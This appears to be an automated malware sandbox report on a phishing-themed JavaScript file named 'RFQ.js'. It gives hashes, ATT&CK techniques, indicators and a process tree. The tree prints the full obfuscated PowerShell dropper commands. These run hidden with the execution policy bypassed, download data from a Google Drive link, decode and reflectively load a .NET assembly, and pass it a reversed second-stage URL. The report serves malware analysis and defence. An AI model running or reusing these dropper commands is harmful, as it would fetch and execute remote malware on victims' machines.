397c1cb5536c84ebaf2ab511cf4183be4364ed6619c0bfaf2ac816a99ec49a4a

General

Target

Collaboration Request/RFQ.js
Size

15KB
MD5

e1b56b06f44512e79ce26a1db4958fa0
SHA1

5c0a3a02fd37d85330012ac27ee59cd05466f866
SHA256

943e6c8dd31effd085cd83c1f681d8c2f5d7d1967b34dacfed7ac3db51d60c1b
SHA512

b5a3e3c82a812375da64ad2e7ba3820d9058adc2f5f3d45035984b27dec64451cbd45b547385e7de221e82b01967aff2495d33a826eb0738871c739a27b95770
SSDEEP

384:zktd8aCPI9hUmMLVmdZyukUnRHxHCiDze:QtdhC6hDYmdZKUnRRiiDze

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	1904	wscript.exe
4	1904	wscript.exe
8	2148	powershell.exe
10	2148	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1100	powershell.exe
2148	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1100	powershell.exe
2148	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1904 wrote to memory of 1100	1904	wscript.exe	30
PID 1904 wrote to memory of 1100	1904	wscript.exe	30
PID 1904 wrote to memory of 1100	1904	wscript.exe	30
PID 1100 wrote to memory of 2148	1100	powershell.exe	32
PID 1100 wrote to memory of 2148	1100	powershell.exe	32
PID 1100 wrote to memory of 2148	1100	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Collaboration Request\RFQ.js"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcASABnAFcAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAKwAnADcAbgBzAGgAdAB0AHAAcwAnACsAJwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAEEASQBWAGcASgBKAEoAdgAxAEYANgB2AFMANABzAFUATwB5AGIAbgBIAC0AcwBEAHYAVQBoAEIAWQB3AHUAcgA3AG4AcwA7AEgAZwBXAHcAZQBiACcAKwAnAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBIAGcAVwBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEgAZwBXAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAJwArACcAKABIAGcAVwBpACcAKwAnAG0AYQBnAGUAJwArACcAVQByAGwAKQA7AEgAZwBXAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgAnACsAJwBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAEgAZwBXAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AEgAZwBXAHMAdABhAHIAdABGAGwAYQBnACAAPQAgADcAbgBzADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ANwBuAHMAOwBIAGcAVwBlAG4AZABGAGwAYQBnACAAPQAgADcAbgBzADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgA3AG4AcwA7AEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAASABnAFcAaQBtAGEAZwBlAFQAZQB4AHQAJwArACcALgBJAG4AZABlAHgATwBmACgASABnAFcAcwB0AGEAcgB0AEYAbABhAGcAKQA7AEgAZwBXAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABIAGcAVwBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABIAGcAJwArACcAVwBlAG4AZABGAGwAYQBnACkAOwBIAGcAVwBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAALQBnAGUAIAAnACsAJwAwACAALQBhAG4AZAAgAEgAZwBXAGUAbgBkAEkAbgBkAGUAeAAgAC0AJwArACcAZwB0ACAASABnAFcAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABIAGcAVwBzAHQAYQByAHQARgBsAGEAZwAuACcAKwAnAEwAZQBuAGcAdABoADsASABnAFcAYgBhACcAKwAnAHMAZQA2ADQATABlAG4AZwB0AGgAJwArACcAIAA9ACAASABnAFcAZQAnACsAJwBuAGQASQBuAGQAZQB4ACAALQAgAEgAZwBXAHMAdABhAHIAdABJAG4AZABlAHgAOwBIAGcAVwBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAEgAZwBXAGkAbQBhACcAKwAnAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABIAGcAJwArACcAVwBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABIAGcAVwBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsASABnAFcAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgASABnAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABiAEcAcwAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAnACsAJwBIAGcAVwBfACAAfQAnACsAJwApAFsALQAxAC4ALgAtACgASABnAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AEgAZwBXAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2ACcAKwAnAGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABIAGcAVwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AEgAZwBXAGwAbwBhAGQAZQBkAEEAcwBzACcAKwAnAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AJwArACcAYQBkACgASABnAFcAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AEgAZwBXAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAJwArACcAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAJwArACcAKAA3AG4AcwBWAEEASQA3AG4AcwApADsASABnAFcAdgBhAGkATQBlAHQAaABvAGQALgAnACsAJwBJAG4AdgBvAGsAZQAoAEgAZwBXAG4AdQBsAGwALAAgAEAAKAAnACsAJwA3AG4AcwB0AHgAdAAuADEAbQB3AHgAeAAnACsAJwAvAHYAdwBlAG4ALwByAGIALgBtAG8AYwAuADUAMAAxAHIAZQAuAG8AbQBsAC8ALwA6AHMAcAB0AHQAaAA3AG4AcwAsACAANwBuAHMAJwArACcAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AcwAsACAANwBuAHMAQwBhAHMAUABvAGwANwBuAHMALAAgADcAbgBzAGQAZQBzAGEAdABpAHYAYQBkAG8ANwBuAHMALAA3AG4AcwBkAGUAcwBhAHQAaQB2AGEAZABvADcAbgBzACwAJwArACcANwBuAHMAZABlAHMAYQB0AGkAdgBhAGQAbwA3AG4AJwArACcAcwAsADcAbgBzAFUAUgBMADcAbgBzACwAIAA3AG4AcwBDADoANABnAFcAUAByAG8AZwByAGEAbQBEAGEAdABhADQAZwBXADcAbgBzACwANwBuAHMAJwArACcAbgBlACcAKwAnAG0AdQA3AG4AcwAsADcAbgBzAGoAcwA3AG4AcwAsADcAbgBzADEANwBuAHMALAA3AG4AcwAxADcAbgBzACkAKQA7ACcAKQAgAC0AQwByAEUAUABMAEEAYwBlACgAWwBjAEgAQQBSAF0AOQA4ACsAWwBjAEgAQQBSAF0ANwAxACsAWwBjAEgAQQBSAF0AMQAxADUAKQAsAFsAYwBIAEEAUgBdADEAMgA0ACAAIAAtAHIAZQBQAEwAQQBjAEUAIAAgACcANABnAFcAJwAsAFsAYwBIAEEAUgBdADkAMgAgACAALQBDAHIARQBQAEwAQQBjAGUAIAAgACgAWwBjAEgAQQBSAF0ANwAyACsAWwBjAEgAQQBSAF0AMQAwADMAKwBbAGMASABBAFIAXQA4ADcAKQAsAFsAYwBIAEEAUgBdADMANgAgAC0AcgBlAFAATABBAGMARQAgACgAWwBjAEgAQQBSAF0ANQA1ACsAWwBjAEgAQQBSAF0AMQAxADAAKwBbAGMASABBAFIAXQAxADEANQApACwAWwBjAEgAQQBSAF0AMwA5ACkAfAAuACgAIAAkAFAAUwBoAG8AbQBlAFsANABdACsAJABwAFMASABvAE0AZQBbADMAMABdACsAJwBYACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('HgWimageUrl = '+'7nshttps'+'://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur7ns;HgWweb'+'Client = New-Object System.Net.WebClient;HgWimageBytes = HgWwebClient.DownloadData'+'(HgWi'+'mage'+'Url);HgWimageText = [Syst'+'em.Text.Encoding]::UTF8.'+'GetSt'+'ring(HgWimageBytes);HgWstartFlag = 7ns<<BASE64_START>>7ns;HgWendFlag = 7ns<<BASE64_END>>7ns;HgWstartIndex = HgWimageText'+'.IndexOf(HgWstartFlag);HgWendIndex = HgWimageText.IndexOf(Hg'+'WendFlag);HgWstartIndex'+' -ge '+'0 -and HgWendIndex -'+'gt HgWstartIndex;HgWstartIndex += HgWstartFlag.'+'Length;HgWba'+'se64Length'+' = HgWe'+'ndIndex - HgWstartIndex;HgWbase64Command = HgWima'+'geText.Substring(Hg'+'WstartIndex, HgWbase64Length);HgWbase64Reversed = -join (HgWbase64Command.ToCharArray() bGs ForEach-Object { '+'HgW_ }'+')[-1..-(HgWbase64Command.Length)];HgWcommandBytes = [System.Conv'+'ert]::FromBase64String(HgWbase64Reversed);HgWloadedAss'+'embly = [System.Reflecti'+'on.Assembly]::Lo'+'ad(HgWcommandBytes);HgWvaiMethod = [dnl'+'ib.IO.Home].GetMethod'+'(7nsVAI7ns);HgWvaiMethod.'+'Invoke(HgWnull, @('+'7nstxt.1mwxx'+'/vwen/rb.moc.501re.oml//:sptth7ns, 7ns'+'desativado7ns, 7nsd'+'esativado7ns, 7nsdesativado7ns, 7nsCasPol7ns, 7nsdesativado7ns,7nsdesativado7ns,'+'7nsdesativado7n'+'s,7nsURL7ns, 7nsC:4gWProgramData4gW7ns,7ns'+'ne'+'mu7ns,7nsjs7ns,7ns17ns,7ns17ns));') -CrEPLAce([cHAR]98+[cHAR]71+[cHAR]115),[cHAR]124 -rePLAcE '4gW',[cHAR]92 -CrEPLAce ([cHAR]72+[cHAR]103+[cHAR]87),[cHAR]36 -rePLAcE ([cHAR]55+[cHAR]110+[cHAR]115),[cHAR]39)|.( $PShome[4]+$pSHoMe[30]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fc8d9f5113cddf307568e8fc8265a0d1

SHA1
ebf691d80fd9bb8be6785e2612dd9015ee71d2e3

SHA256
8bfcea2ee97881ddc9dbd35d311e59d2499b2bffa9bfbef55b0a64e70ce9fbc0

SHA512
956d6837ffa18454a0d84e97032058959298987d6de038ae1fe8ba3e098e9f3580086d1f3c563335dfe79954aa50fb553a5a85c2f53486afa7ad50a34bb5bcb0

Download Submit
memory/1100-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/1100-5-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/1100-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/1100-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/1100-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/1100-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/1100-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/1100-12-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/1100-17-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing